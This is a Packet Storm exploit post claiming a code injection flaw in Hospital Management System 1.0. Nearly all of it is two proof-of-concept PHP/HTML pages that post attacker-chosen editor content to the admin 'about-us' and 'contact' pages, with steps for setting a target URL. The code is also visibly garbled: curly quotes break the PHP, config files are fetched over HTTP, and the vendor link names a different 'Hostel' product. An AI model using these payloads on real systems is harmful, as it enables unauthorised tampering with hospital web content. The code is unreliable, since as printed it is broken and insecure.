Security
Headlines
HeadlinesLatestCVEs

Headline

Hospital Management System 1.0 Code Injection

Hospital Management System version 1.0 suffers from a code injection vulnerability.

Packet Storm
#sql#vulnerability#windows#google#js#java#php#auth#firefox

=============================================================================================================================================
| # Title : Hospital Management System 1.0(WYSIWYG) code injection Vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 129.0.1 (64 bits) |
| # Vendor : https://phpgurukul.com/wp-content/uploads/2017/12/Hostel-Management-Syste-Updated-Code.zip |
=============================================================================================================================================

poc :

[+] Dorking İn Google Or Other Search Enggine.

[+] Part 01 : about-us.php

[+] This payload injects code of your choice into the database via NicEdit is a WYSIWYG editor V: 0.9 r25 which is called inside the file /hms/admin/about-us.php .

[+] Line 2 : Make sure to include your database connection here

[+] Line 44 : Send the form data using fetch API (Set your target url)

[+] save payload as poc.php in your localhost path .

[+] payload :

<?php
include(‘http://127.0.0.1/hospital/hms/admin/include/config.php’); // Make sure to include your database connection here

if (isset($_POST[‘submit’])) {
$pagetitle = $_POST[‘pagetitle’];
$pagedes = $con->real_escape_string($_POST[‘pagedes’]);
$query = mysqli_query($con, “UPDATE tblpage SET PageTitle=’$pagetitle’, PageDescription=’$pagedes’ WHERE PageType=’aboutus’”);

if ($query) {  
    echo '<script>alert("About Us has been updated.")</script>';  
} else {  
    echo '<script>alert("Something Went Wrong. Please try again.")</script>';  
}  
exit;  

}
?>

<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>indoushka | Update About Us Content</title>
<!-- NicEdit Script -->
<script src="http://js.nicedit.com/nicEdit-latest.js" type="text/javascript"></script>
<script type="text/javascript">
// Apply NicEdit to all text areas when the DOM is loaded
bkLib.onDomLoaded(nicEditors.allTextAreas);

    // Function to handle form submission using JavaScript  
    function submitForm(event) {  
        event.preventDefault(); // Prevent default form submission

        const pagetitle = document.getElementById('pagetitle').value;  
        const pagedes = nicEditors.findEditor('pagedes').getContent(); // Get the NicEdit content

        // Prepare the form data to be sent  
        const formData = new FormData();  
        formData.append('pagetitle', pagetitle);  
        formData.append('pagedes', pagedes);  
        formData.append('submit', true);

        // Send the form data using fetch API  
        fetch('http://127.0.0.1/hospital/hms/admin/about-us.php', {  
            method: 'POST',  
            body: formData,  
        })  
        .then(response => response.text())  
        .then(data => {  
            alert('About Us content has been updated successfully.');  
            console.log(data); // Handle the response from the server  
        })  
        .catch(error => {  
            console.error('Error:', error);  
        });  
    }  
</script>  
<style>  
    /* Center the form container */  
    .editor-container {  
        max-width: 800px;  
        margin: 0 auto; /* Center horizontally */  
        padding: 20px;  
        text-align: center; /* Center the content inside */  
    }

    /* Ensure the textarea takes the full width */  
    #pagedes {  
        width: 100%;  
        height: 300px;  
        margin: 0 auto;  
    }  
</style>  

</head>
<body>
<div id="app">
<div class="app-content">
<div class="main-content">
<div class="wrap-content container" id="container">
<!-- Page Title Section -->
<section id="page-title">
<div class="row">
<div class="col-sm-8">
<h1 class="mainTitle">Update the About Us Content</h1>
</div>

                                                      </li>  
                        </ol>  
                    </div>  
                </section>  
                <!-- Form Section -->  
                <div class="container-fluid container-fullw bg-white">  
                    <div class="row">  
                        <div class="col-md-12">  
                            <!-- Centering the form using a wrapper div -->  
                            <div class="editor-container">  
                                <form class="forms-sample" method="post" onsubmit="submitForm(event);">  
                                    <div class="form-group">  
                                        <label for="pagetitle">Page Title</label>  
                                        <input id="pagetitle" name="pagetitle" type="text" class="form-control" required>  
                                    </div>  
                                    <div class="form-group">  
                                        <label for="pagedes">Page Description</label>  
                                        <!-- NicEdit will enhance this textarea -->  
                                        <textarea class="form-control" name="pagedes" id="pagedes" rows="12"></textarea>  
                                    </div>  
                                    <button type="submit" class="btn btn-primary mr-2" name="submit">Submit</button>  
                                </form>  
                            </div>  
                        </div>  
                    </div>  
                </div>  
                <!-- End Form Section -->  
            </div>  
        </div>  
    </div>  
</div>  
<!-- Footer -->  

</body>
</html>

---------------------- [+] Part 02 : contact.php [+] --------------------

[+] Line 4 : Make sure to include your database connection here

[+] Line 60 : Send the form data using fetch API (Set your target url)

[+] save payload as poc.php in your localhost path .

[+] payload :

<?php

// عنوان الخادم الخارجي
$url = 'http://127.0.0.1/hospital/hms/admin/include/config.php’;

// جلب البيانات من الخادم الخارجي
$response = file_get_contents($url);

// التحقق من وجود البيانات
if ($response !== FALSE) {
// التعامل مع البيانات
echo $response;
} else {
echo 'حدث خطأ أثناء جلب البيانات.’;
}

if (isset($_POST[‘submit’])) {
$pagetitle = $_POST[‘pagetitle’];
$pagedes = $con->real_escape_string($_POST[‘pagedes’]);
$email = $con->real_escape_string($_POST[‘email’]);
$mobnum = $con->real_escape_string($_POST[‘mobnum’]);

    $query = mysqli_query($con, "UPDATE tblpage SET PageTitle='$pagetitle', PageDescription='$pagedes', Email='$email', MobileNumber='$mobnum' WHERE PageType='contactus'");

if ($query) {  
    echo '<script>alert("Contact Us has been updated.")</script>';  
} else {  
    echo '<script>alert("Something Went Wrong. Please try again.")</script>';  
}  
exit;  

}

?>
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>Admin | Update Contact Us Content</title>
<!-- NicEdit Script -->
<script src="http://js.nicedit.com/nicEdit-latest.js" type="text/javascript"></script>
<script type="text/javascript">
bkLib.onDomLoaded(nicEditors.allTextAreas);

    function submitForm(event) {  
        event.preventDefault();

        const pagetitle = document.getElementById('pagetitle').value;  
        const pagedes = nicEditors.findEditor('pagedes').getContent();  
        const email = document.getElementById('email').value;  
        const mobnum = document.getElementById('mobnum').value;

        const formData = new FormData();  
        formData.append('pagetitle', pagetitle);  
        formData.append('pagedes', pagedes);  
        formData.append('email', email);  
        formData.append('mobnum', mobnum);  
        formData.append('submit', true);

        fetch('http://127.0.0.1/hospital/hms/admin/contact.php', {  
            method: 'POST',  
            body: formData,  
        })  
        .then(response => response.text())  
        .then(data => {  
            alert('Contact Us content has been updated successfully.');  
            console.log(data);  
        })  
        .catch(error => {  
            console.error('Error:', error);  
        });  
    }  
</script>  
<style>  
    .editor-container {  
        max-width: 800px;  
        margin: 0 auto;  
        padding: 20px;  
        text-align: center;  
    }

    #pagedes {  
        width: 100%;  
        height: 300px;  
        margin: 0 auto;  
    }  
</style>  

</head>
<body>
<div id="app">
<div class="app-content">
<div class="main-content">
<div class="wrap-content container" id="container">
<section id="page-title">
<div class="row">
<div class="col-sm-8">
<h1 class="mainTitle">Admin | Update Contact Us Content</h1>
</div>
<ol class="breadcrumb">
<li class="active">
<span>Update Contact Us Content</span>
</li>
</ol>
</div>
</section>
<div class="container-fluid container-fullw bg-white">
<div class="row">
<div class="col-md-12">
<div class="editor-container">
<form class="forms-sample" method="post" onsubmit="submitForm(event);">
<div class="form-group">
<label for="pagetitle">Page Title</label>
<input id="pagetitle" name="pagetitle" type="text" class="form-control" required>
</div>
<div class="form-group">
<label for="pagedes">Page Description</label>
<textarea class="form-control" name="pagedes" id="pagedes" rows="12"></textarea>
</div>
<div class="form-group">
<label for="email">Email</label>
<input id="email" name="email" type="email" class="form-control" required>
</div>
<div class="form-group">
<label for="mobnum">Mobile Number</label>
<input id="mobnum" name="mobnum" type="text" class="form-control" required>
</div>
<button type="submit" class="btn btn-primary mr-2" name="submit">Submit</button>
</form>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</body>
</html>

Greetings to :============================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |
==========================================================================

Packet Storm: Latest News

CUPS IPP Attributes LAN Remote Code Execution